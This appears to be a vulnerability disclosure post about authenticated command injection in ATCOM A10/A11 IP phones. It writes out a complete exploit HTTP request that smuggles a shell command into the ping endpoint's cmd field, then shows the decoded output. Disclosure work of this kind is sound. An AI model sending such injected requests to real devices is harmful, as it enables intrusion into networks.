- Published on
ATCOM A10/A11; Authenticated Command Injection
- Authors
- Name
- MOHAMMED ADEL
Introduction
An authenticated threat actor has the capability of executing commands on the operating system (busybox) of the ATCOM A10/A11 devices using a specially crafted HTTP request. If appropriate security controls are not in place, this vulnerability can serve as a base-ground for threat actors to establish persistent access within the affected organization's network.
Exploit
The below is the exploit request:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
The response of the above request is as follows:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of ping_cmd_result is encoded as base64. Decoding the value of ping_cmd_result reveals the result of the command executed as shown below:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
Affected Firmware Versions
After conducting thorough testing, it has been determined that all firmware versions after 2.7.x.x of the ATCOM A10/A11 devices are susceptible to the authenticated command injection vulnerability.
Mitigation / Fix
The best mitigation that could be implemented is to downgrade the firmware version of the ATCOM A10/A11 devices to an older version; 2.6.x.x or older where the vulnerable feature does not exist.
Reference
- Exploit-DB: https://www.exploit-db.com/exploits/51742